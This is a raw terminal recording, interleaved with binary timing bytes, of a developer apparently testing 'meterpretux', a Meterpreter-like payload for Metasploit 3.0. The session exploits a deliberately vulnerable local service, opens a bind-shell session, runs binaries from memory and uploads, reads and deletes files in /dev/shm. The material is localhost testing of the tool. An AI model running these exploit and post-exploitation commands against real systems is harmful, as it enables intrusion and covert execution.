D|ÅF¸m :compaq@soleil:/opt/contrib/sam/meterpretux/framework-3.0$ F|ÅFpBnF|ÅF?YeF|ÅF×” tF|ÅFó sF|ÅF©› tG|ÅFd aG|ÅF‚®tG|ÅF¸ G|ÅF å -H|ÅF"aH|ÅF€ºtH|ÅFô(pH|ÅF¹Ê H|ÅF_Ñ |I|ÅF5_ I|ÅFW–gI|ÅFÉ rI|ÅF‘, eI|ÅF pJ|ÅFUD J|ÅFÀ¤4J|ÅFÆ5J|ÅFëu 4J|ÅFw¦ 5K|ÅFfn K|ÅFƒ (Tous les processus ne peuvent être identifiés, les infos sur les processus non possédés ne seront pas affichées, vous devez être root pour les voir toutes.) K|ÅF‚›etcp 0 0 *:4545 *:* LISTEN 4961/exploitme-posi K|ÅFÀ:compaq@soleil:/opt/contrib/sam/meterpretux/framework-3.0$ N|ÅF ±t./msfcli exploit/test/aggressive PAYLOAD=linux/x86/meterpretux/meterpr etux_bind_tcp RHOST=localhost RPORT=4545 E O|ÅF«[*] Started bind handler O|ÅFƒÃ![*] Sending 345 byte payload... P|ÅFñg[*] Sending stage (5502 bytes) [*] Meterpretux session 1 opened (127.0.0.1:2044 -> 127.0.0.1:4444) P|ÅFöómeterpretux > Q|ÅFñ5 hQ|ÅFk®eR|ÅFÝnlR|ÅFvúpR|ÅF^1 R|ÅF£7] Core Commands ============= Command Description ------- ----------- ? Help menu cmd Execute a shell cmd download Download a file exec Execute binary exit Terminate the meterpretux session help Help menu jmp Execute mmaped binary ls List mmaped binaries quit Terminate the meterpretux session rm Delete mmaped binary set Set env vars shell Get a shell upload Upload a file R|ÅF´:meterpretux > W|ÅF!=sX|ÅF~O X|ÅF¸{eX|ÅFÖºxX|ÅF­p eY|ÅF_ØcY|ÅFp Z|ÅF„ë tZ|ÅFÁB e[|ÅFãs[|ÅF.t[|ÅFª^ .[|ÅF¦F s[|ÅFƒco\|ÅFw9 \|ÅF -\|ÅF;r\|ÅF3  \|ÅFû5 "[-] file test.so doesn't exist \|ÅFR6 meterpretux > ]|ÅF^Ês]|ÅFÔá e]|ÅFE t^|ÅF=³ ^|ÅF6´BINPATH -> ^|ÅFy´meterpretux > _|ÅFãÆs_|ÅF9ae_|ÅFt_|ÅFhÔ  a|ÅF¹í BINPATHb|ÅFóÕ f|ÅF~/opt/contrib/sam/meterpretuxg|ÅF^l/g|ÅFƒbg|ÅF+fig|ÅFØS ng|ÅFÛM ag|ÅFɧ rh|ÅFe]ih|ÅFmseh|ÅFÅsi|ÅFY4 i|ÅF6meterpretux > k|ÅF1«sk|ÅF¸ek|ÅFM tk|ÅFÉ  k|ÅF 4BINPATH -> /opt/contrib/sam/meterpretux/binaries k|ÅFp meterpretux > l|ÅFY¹ em|ÅFe·xm|ÅFDáem|ÅFÑøcm|ÅFšÇ  p|ÅFq test.sop|ÅFð³  q|ÅFù»-q|ÅFŸ¶rq|ÅF  q|ÅF¯$  r|ÅFŸ+ otrunk todo tags framework-3.0.tgz framework-3.0 exploitme-posix.c exploitme-posix branches binaries r|ÅF”] meterpretux > s|ÅFDWet|ÅF™{xt|ÅFì²et|ÅF!M ct|ÅFõÛ  t|ÅF°etest.sou|ÅF8é u|ÅFKP -u|ÅF9i au|ÅF¾é lv|ÅFÍipv|ÅF~À v|ÅFÔÇtest.so is already mmaped ! v|ÅFöÑmeterpretux > w|ÅFÉÓ lw|ÅF[Á sw|ÅFHß w|ÅFÇå÷ Binary Len Mmap Addr Jump Addr ====================================================================================== test.so 8192 0xb7f5d000 0xb7f5d500 w|ÅFÓmeterpretux > y|ÅFëÆjy|ÅF!U my|ÅFXÎ py|ÅFMÇ z|ÅFj3test.soz|ÅFpM z|ÅFñ< -z|ÅFP³ a{|ÅF€Ïl{|ÅF·p{|ÅFÕÿ {|ÅFw ||ÅFè Ütotal 5524 drwxr-xr-x 8 compaq compaq 4096 Aug 17 12:44 ./ drwxr-xr-x 15 compaq compaq 4096 Aug 16 13:42 ../ drwxr-xr-x 6 compaq compaq 4096 Aug 3 13:58 .svn/ drwxr-xr-x 2 compaq compaq 4096 Aug 17 11:42 binaries/ drwxr-xr-x 3 compaq compaq 4096 Jul 30 14:24 branches/ -rwxr-xr-x 1 compaq compaq 8705 Jul 19 11:31 exploitme-posix -rw-r--r-- 1 compaq compaq 1384 Jul 19 11:31 exploitme-posix.c drwxr-xr-x 11 compaq compaq 4096 Aug 14 13:34 framework-3.0/ -rw-r--r-- 1 compaq compaq 5589977 Aug 17 11:22 framework-3.0.tgz drwxr-xr-x 3 compaq compaq 4096 Jul 30 14:24 tags/ -rw-r--r-- 1 compaq compaq 3472 Aug 17 12:44 todo drwxr-xr-x 5 compaq compaq 4096 Aug 17 11:49 trunk/ ||ÅFR meterpretux > ~|ÅF]ir~|ÅF¢m~|ÅFOÁ €|ÅFz{test.so€|ÅF‚0 €|ÅF@G+[#] unmaping test.so [#] unmaped test.so €|ÅFRmeterpretux > |ÅF¶¤ l|ÅFÊJ s‚|ÅFÙ  ‚|ÅFæ ª Binary Len Mmap Addr Jump Addr ====================================================================================== ‚|ÅFç: meterpretux > „|ÅFÀo c„|ÅF%À m„|ÅF*¨ d‡|ÅFò5 ‡|ÅF¥ ‡|ÅF+I  ˆ|ÅF‘rhˆ|ÅF 3eˆ|ÅF#lˆ|ÅFp‡pˆ|ÅFû  ˆ|ÅF ] Core Commands ============= Command Description ------- ----------- ? Help menu cmd Execute a shell cmd download Download a file exec Execute binary exit Terminate the meterpretux session help Help menu jmp Execute mmaped binary ls List mmaped binaries quit Terminate the meterpretux session rm Delete mmaped binary set Set env vars shell Get a shell upload Upload a file ˆ|ÅFq meterpretux > ‰|ÅF>sŠ|ÅF*þhŠ|ÅFÎOeŠ|ÅF‡ãlŠ|ÅF;_l‹|ÅFX² ‹|ÅFz¸([#] Type 'exit' to quit this shell.. Œ|ÅFL`cŒ|ÅFPY aŒ|ÅFšÉ t|ÅF#w |ÅF¼/|ÅFkž e|ÅFu› t|ÅFôscŽ|ÅFE/Ž|ÅFOâdŽ|ÅFÆ· eŽ|ÅF™C bŽ|ÅFîö i|ÅFüga|ÅFÁón|ÅFS _|ÅFv} v|ÅF¾1 e|ÅFÌ r|ÅFÑ’s|ÅFàyi|ÅF…go|ÅFT™n‘|ÅFi ‘|ÅFÜ/ 4.0 ’|ÅFŸG p’|ÅF׸ w“|ÅFu0d“|ÅFpN “|ÅFÿ^" /opt/contrib/sam/meterpretux •|ÅF‰3 e•|ÅFŸ x–|ÅF½<i–|ÅF&t—|ÅF —|ÅFs–meterpretux > ˜|ÅFèMc˜|ÅF¬Sm˜|ÅFŽ}d˜|ÅFF> ™|ÅFª¨ -š|ÅFœaš|ÅFj2  š|ÅFÕ  ›|ÅF’l›|ÅFws›|ÅFs; ›|ÅFt´-›|ÅFÁg a›|ÅF‰ l›|ÅFSLpœ|ÅF®Ì œ|ÅF?× |ÅFËåÜtotal 5524 drwxr-xr-x 8 compaq compaq 4096 Aug 17 12:44 ./ drwxr-xr-x 15 compaq compaq 4096 Aug 16 13:42 ../ drwxr-xr-x 6 compaq compaq 4096 Aug 3 13:58 .svn/ drwxr-xr-x 2 compaq compaq 4096 Aug 17 11:42 binaries/ drwxr-xr-x 3 compaq compaq 4096 Jul 30 14:24 branches/ -rwxr-xr-x 1 compaq compaq 8705 Jul 19 11:31 exploitme-posix -rw-r--r-- 1 compaq compaq 1384 Jul 19 11:31 exploitme-posix.c drwxr-xr-x 11 compaq compaq 4096 Aug 14 13:34 framework-3.0/ -rw-r--r-- 1 compaq compaq 5589977 Aug 17 11:22 framework-3.0.tgz drwxr-xr-x 3 compaq compaq 4096 Jul 30 14:24 tags/ -rw-r--r-- 1 compaq compaq 3472 Aug 17 12:44 todo drwxr-xr-x 5 compaq compaq 4096 Aug 17 11:49 trunk/ |ÅFä,meterpretux > ž|ÅFlŸ|ÅF~1sŸ|ÅFž[ Ÿ|ÅF b÷ Binary Len Mmap Addr Jump Addr ====================================================================================== lib/rex/post/meterpretux/extensions/cmd.so 8192 0xb7f5d000 0xb7f5d680 Ÿ|ÅF>…meterpretux > ¡|ÅFÞ” c¡|ÅFˆè m¡|ÅF?td¢|ÅFK‰ ¢|ÅFÂù c¢|ÅF ‡ a¢|ÅFNªt£|ÅFKs £|ÅFÿ7/£|ÅF„à e£|ÅF.l t£|ÅFøc¤|ÅFÊ>/¤|ÅFË·d¤|ÅFº§ e¤|ÅFãÿ b¤|ÅF™‹ i¤|ÅF;Ma¥|ÅF{‰n¥|ÅFŸ†_¥|ÅFáv¥|ÅFODe¥|ÅF,Ý r¥|ÅFÖ. s¥|ÅF’_i¦|ÅF“2o¦|ÅF.ènª|ÅF Ÿ ª|ÅF¥ «|ÅF9‘4.0 «|ÅFO›meterpretux > ®|ÅFHÊe®|ÅFà x¯|ÅFóe¯|ÅF¹tc¯|ÅFÉ\ ¯|ÅF˹ i¯|ÅF1‚k°|ÅFüe°|ÅFÖ¦-°|ÅF’:s°|ÅF9 c°|ÅFš a°|ÅFU³ n±|ÅF(¾  ²|ÅF ü ³|ÅFa* «ERROR: Could not bind network socket to local port 500 You need to be root, or ike-scan must be suid root to bind to ports below 1024. ERROR: bind: Permission denied ³|ÅF÷> meterpretux > µ|ÅFË\cµ|ÅF݆mµ|ÅF:dµ|ÅF µ|ÅF3Ñ iµ|ÅF_ò dµ|ÅF×ü µ|ÅF ·|ÅFìÄzuid=1000(compaq) gid=1000(compaq) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(compaq) ·|ÅF¤Ïmeterpretux > ¹|ÅFŽ•e¹|ÅF:K xº|ÅF3—eº|ÅFºcº|ÅFòz º|ÅFù” aº|ÅFŸ— mº|ÅFa»|ÅF_”p»|ÅFdc»|ÅFð r»|ÅFº a¼|ÅFƒBp¼|ÅF)Œ ¼|ÅFŸ ½|ÅF¨¨amapcrap v5.2 (c) 2005 by van Hauser/THC Syntax: amapcrap [-S] [-u] [-m 0ab] [-M min,max] [-n connects] [-N delay] [-w delay] [-e] [-v] TARGET PORT Options: -S use SSL after TCP connect (not usuable with -u) -u use UDP protocol (default: TCP) (not usable with -c) -n connects maximum number of connects (default: unlimited) -N delay delay between connects in ms (default: 0) -w delay delay before closing the port (default: 250) -e do NOT stop when a response was made by the server -v verbose mode -m 0ab send as random crap:0-nullbytes, a-letters+spaces, b-binary -M min,max minimum and maximum length of random crap TARGET PORT target (ip or dns) and port to send random crap This tool sends random data to a silent port to illicit a response, which can then be used within amap for future detection. It outputs proper amap appdefs definitions. Note: by default all modes are activated (0:10%, a:40%, b:50%) . Mode 'a' always sends one line with letters and spaces which end with \r\n. Visit our homepage at http://www.thc.org ½|ÅF­meterpretux > ¿|ÅFÆÉl¿|ÅF®± s¿|ÅFÆ•  ¿|ÅF ” Binary Len Mmap Addr Jump Addr ====================================================================================== amapcrap 16384 0xb7f59000 0xb7f59cc0 ike-scan 102400 0xb7e0d000 0xb7e0ebf0 lib/rex/post/meterpretux/extensions/cmd.so 8192 0xb7f5d000 0xb7f5d680 ¿|ÅFÊ meterpretux > Â|ÅFxM cÂ|ÅFæO mÂ|ÅF Û dÃ|ÅFë Ã|ÅFJ¦mÃ|ÅF÷¿oÃ|ÅFé uÃ|ÅF±ù nÃ|ÅFª tÃ|ÅF±þ Ã|ÅFÍ Å|ÅF Èâ/dev/hda2 on / type ext3 (rw,errors=remount-ro) tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755) proc on /proc type proc (rw,noexec,nosuid,nodev) sysfs on /sys type sysfs (rw,noexec,nosuid,nodev) procbususb on /proc/bus/usb type usbfs (rw) udev on /dev type tmpfs (rw,mode=0755) tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev) devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620) /dev/hda3 on /home type ext3 (rw) /dev/mapper/opt on /opt type ext3 (rw) Å|ÅFÀÿmeterpretux > É|ÅF¤ uÉ|ÅF d pÉ|ÅF9lÊ|ÅF˜oÊ|ÅFJ>aÊ|ÅFú¤dÊ|ÅFð  Ì|ÅFÓD /Í|ÅFü£eÍ|ÅFntÍ|ÅFß+cÍ|ÅFwÁ /Î|ÅFñndÎ|ÅFæ^eÎ|ÅF&tbÎ|ÅF‹ÉiÎ|ÅFI˜aÎ|ÅFÑW nÏ|ÅFI¦_Ï|ÅF"\vÏ|ÅFYÀeÏ|ÅFérÏ|ÅFžl sÏ|ÅFò iÏ|ÅFºÓ oÐ|ÅFܬnÑ|ÅF¾ø Ó|ÅFþ= /dev/shmÔ|ÅF2:/Õ|ÅFÂðfÕ|ÅFCóoÕ|ÅFIoÕ|ÅFrSbÕ|ÅFw; aÕ|ÅF2 r×|ÅF,m  ×|ÅFBu ;[#] uploading from /etc/debian_version to /dev/shm/foobar ×|ÅFï† :[#] uploaded from /etc/debian_version to /dev/shm/foobar ×|ÅFÇŒ meterpretux > Ù|ÅFŒÂcÙ|ÅF±u mÙ|ÅFˆ’ dÙ|ÅF• Ú|ÅF PlÚ|ÅFí’sÚ|ÅFsí Ú|ÅF3 -Ú|ÅF©Ä aÛ|ÅFðlÛ|ÅFo{pÛ|ÅFz¥ Ý|ÅF‡A/dev/shm/foobarÝ|ÅFT  Ý|ÅFF\  Þ|ÅFåb =-rwx------ 1 compaq compaq 4 Aug 17 12:47 /dev/shm/foobar Þ|ÅFem meterpretux > á|ÅF¥ƒcá|ÅFÙ` aá|ÅF|ôtâ|ÅFÀ‡ â|ÅFq¦  â|ÅF=G  â|ÅFÇ  ã|ÅFæ?mã|ÅFf±dã|ÅFkÆ ã|ÅF-¶ cã|ÅFJ7 aã|ÅF Ãtä|ÅF) ä|ÅFÀm/dev/shm/foobarå|ÅF•_ å|ÅF”g æ|ÅFdu4.0 æ|ÅF©meterpretux > ç|ÅFðcç|ÅFfEmç|ÅF÷àdç|ÅFÎ ç|ÅFo rç|ÅFa® mè|ÅFæ è|ÅFî/dev/shm/foobarè|ÅFƒ  è|ÅF«Š  é|ÅFã¼ meterpretux > ê|ÅFcê|ÅFv mê|ÅFÏÕ dê|ÅF7÷  ë|ÅFƒj-ë|ÅFôi ë|ÅF@à lì|ÅFÄ)sì|ÅFö> ì|ÅF"-ì|ÅFwºaì|ÅF¼¬lì|ÅF†é pì|ÅFÕ  í|ÅFÒ+/dev/shm/foobarí|ÅFe  í|ÅF.  î|ÅFn 7/bin/ls: /dev/shm/foobar: No such file or directory î|ÅFô" meterpretux > ð|ÅFÅNlð|ÅFsð|ÅFuî ð|ÅF?õ” Binary Len Mmap Addr Jump Addr ====================================================================================== amapcrap 16384 0xb7f59000 0xb7f59cc0 ike-scan 102400 0xb7e0d000 0xb7e0ebf0 lib/rex/post/meterpretux/extensions/cmd.so 8192 0xb7f5d000 0xb7f5d680 ð|ÅFƒ"meterpretux > ö|ÅF ‚qö|ÅF:`uö|ÅFÄÐiö|ÅFMq t÷|ÅFñ ÷|ÅFºû`[!] unmaping all binaries .. amapcrap ike-scan lib/rex/post/meterpretux/extensions/cmd.so ÷|ÅFzA :compaq@soleil:/opt/contrib/sam/meterpretux/framework-3.0$